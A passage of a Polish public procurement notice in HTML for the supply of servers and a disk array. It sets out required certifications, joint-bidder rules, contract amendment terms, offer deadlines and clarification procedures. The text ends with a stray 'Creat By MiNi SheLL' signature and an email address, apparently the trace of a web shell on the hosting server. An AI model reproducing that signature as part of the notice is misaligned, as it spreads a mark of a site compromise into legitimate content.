reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu<br/>pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. Przepis pkt 3 stosuje się.<br/>5. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne (Dz. U. z 2024 r. poz. 307), jeśli Wykonawca wskazał w<br/>ofercie<br/>dane umożliwiające dostęp do tych środków.<br/>5. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli<br/>Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1) Serwer <br/>1. Serwer musi być wyprodukowany zgodnie z normą ISO-9001:2015, ISO-50001 oraz ISO-14001.<br/>2. Serwer musi posiadać deklaracja CE.<br/>3. Oferowane produkty muszą zawierać informacje dotyczące ponownego użycia i recyklingu, nie mogą zawierać farb i powłok na dużych plastikowych częściach, których nie da się poddać recyklingowi lub ponownie użyć. Potwierdzeniem spełnienia powyższego wymogu jest wydruk ze strony internetowej www.epeat.net potwierdzający spełnienie normy co najmniej Epeat Silver według normy wprowadzonej w 2019 r.<br/>Wszystkie powyższe certyfikaty należy dołączyć do oferty.<br/><br/>2) Macierz<br/>1. Urządzenie musi spełniać następujące standardy bezpieczeństwa: EN 62368-1 (European Union), IEC 60950-1 (International).<br/>2. Urządzenie musi być wyprodukowany zgodnie z normami ISO 9001 oraz ISO 14001.<br/>3. Urządzenie musi posiadać europejską deklarację zgodności CE.<br/>Wszystkie powyższe certyfikaty należy dołączyć do oferty. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wszystkie przedmiotowe środki dowodowe wymienione w SEKCJI V w pkt 5.8. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą powinny być złożone również:<br/>1. Przedmiotowe środki dowodowe (Wykonawcy ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do<br/>składanej oferty przedmiotowe środki dowodowe wymienione w załączniku nr 1 do SWZ);<br/>2. Dokumenty, z których wynika prawo do podpisania oferty (oryginał w postaci dokumentu elektronicznego) względnie do<br/>podpisania innych oświadczeń lub dokumentów składanych wraz z ofertą, chyba, że Zamawiający może je uzyskać<br/>w szczególności za pomocą bezpłatnych i ogólnodostępnych baz danych,<br/>w szczególności rejestrów publicznych w rozumieniu ustawy o informatyzacji działalności podmiotów realizujących zadania<br/>publiczne Ustawa z dnia 17 lutego 2005 r. – o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U.<br/>z 2024 r. poz. 307) , a Wykonawca wskazał to wraz ze złożeniem ofert;<br/>3. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie, o którym mowa w art. 117<br/>ust. 4 ustawy Pzp - Propozycja treści wyżej wymienionego oświadczenia Wykonawców stanowi załącznik nr 3 do SWZ<br/>(jeżeli dotyczy);<br/>4. Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być<br/>ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia<br/>umowy. Pełnomocnictwo winno być sporządzone w postaci elektronicznej i opatrzone kwalifikowanym podpisem<br/>elektronicznym (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu na podstawie art. 108 ust. 1, art. 109 ust. 1 pkt 4 oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz. U. z<br/>2024 r. poz. 507).<br/>3. W przypadku składania oferty wspólnej przez kilku Wykonawców, każdy<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi złożyć dokumenty i oświadczenia wskazane w<br/>SEKCJI V pkt 5.5.) - w zakresie podstaw wykluczenia oraz pkt 5.6). Pozostałe dokumenty będą traktowane jako wspólne.<br/>4. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za niewykonanie lub<br/>nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego.<br/>5. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>6. W formularzu ofertowym w miejscu „nazwa i adres Wykonawcy” należy wpisać dane dotyczące wszystkich podmiotów<br/>wspólnie ubiegających się o udzielenie zamówienie, a nie tylko pełnomocnika.<br/>7. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia kluczowych zadań w ramach zamówienia.<br/>8. Przed podpisaniem umowy od Wykonawców ubiegających się wspólnie o zamówienie publiczne, których oferta została<br/>wybrana Zamawiający będzie żądać umowy regulującej ich współpracę.<br/>9. Zamawiający nie określa szczególnego, obiektywnie uzasadnionego, sposobu spełniania przez Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia warunków udziału w postępowaniu.<br/>10. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>11. W przypadku, o którym mowa w pkt 10 Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni Wykonawcy. Propozycja treści oświadczenia Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia w zakresie, o którym mowa w art. 117 ust. 4 ustawy Pzp stanowi załącznik nr 3 do Specyfikacji Warunków<br/>Zamówienia (SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia umowy wymagają dla swej ważności formy pisemnej w postaci aneksu.<br/>2. W uzasadnionych przypadkach Zamawiający przewiduje istotne zmiany postanowień zawartej umowy w stosunku do<br/>treści oferty, na podstawie której dokonano wyboru Wykonawcy. W powyższym zakresie Zamawiający przewiduje<br/>możliwość dokonania zmiany umowy w stosunku do treści oferty Wykonawcy w przypadku wystąpienia zmiany przepisów<br/>prawa dotyczących zmiany stawki podatku od towarów i usług na umotywowany wniosek Wykonawcy w drodze aneksu do<br/>umowy. Umotywowany wniosek musi zawierać kalkulację udowadniającą, że zmiana stawki podatku od towarów i usług ma<br/>wpływ na cenę lub koszt wykonania zamówienia przez Wykonawcę. W przypadku zaakceptowania zmiany przez<br/>Zamawiającego zmianie ulegnie wynagrodzenie brutto bez zmiany wynagrodzenia netto za przedmiot umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy e-Zamówienia przy użyciu zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-29 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Adres strony internetowej prowadzonego postępowania oraz udostępniania zmian do SWZ oraz dokumentów:<br/>https://bip.pbgitr.geodezja.pl/articles/458/dostawa-serwerow-wraz-z-dyskami-i-zasilaczami?m=458.<br/>2. Składanie ofert wraz z wymaganymi załącznikami następuje za pośrednictwem platformy e-Zamówienia.<br/>3. Zaleca się by Wykonawca kontrolował na bieżąco stronę prowadzonego postępowania pod kątem ewentualnych zmian i<br/>modyfikacji treści SWZ dokonywanych przez Zamawiającego w przedmiotowym postępowaniu zgodnie z art. 286 ust. 1<br/>ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1605 i 1720), dalej zwanej „ustawą<br/>Pzp”.<br/>4. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań w ramach<br/>zamówienia.<br/>5. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy (podwykonawcom).<br/>6. Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, sporządzone w<br/>języku obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>7. Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ, kierując go na adres poczty<br/>elektronicznej: wzp@pbgitr.geodezja.pl. Zamawiający prosi o przekazywanie pytań na ww. adres również w formie<br/>edytowalnej, gdyż skróci to czas udzielania wyjaśnień.<br/>8. Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod<br/>warunkiem że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu<br/>składania ofert.<br/>9. Jeżeli Zamawiający nie udzieli wyjaśnień w terminie, o którym mowa w pkt 10, przedłuża termin składania ofert o czas<br/>niezbędny do zapoznania się wszystkich zainteresowanych Wykonawców z wyjaśnieniami niezbędnymi do należytego<br/>przygotowania i złożenia ofert.<br/>10. Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści SWZ, o którym<br/>mowa w pkt 8.<br/>11. W przypadku gdy wniosek o wyjaśnienie treści SWZ nie wpłynął w terminie,<br/>o którym mowa w pkt 8, Zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz obowiązku przedłużenia terminu<br/>składania ofert.<br/>12. Treść zapytań wraz z wyjaśnieniami Zamawiający udostępnia, bez ujawniania źródła zapytania, na stronie internetowej<br/>prowadzonego postępowania.<br/>13. Formularze do komunikacji na platformie e-Zamówienia pozwalają również na dołączenie załączników. Korzystanie z<br/>„Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta podmiotu „Wykonawca” na Platformie oraz<br/>zalogowania się na Platformie. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących<br/>treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie. Maksymalny<br/>rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 25 MB – ta wielkość dotyczy plików<br/>załączanych do jednego formularza.

Creat By MiNi SheLL
Email: jattceo@gmail.com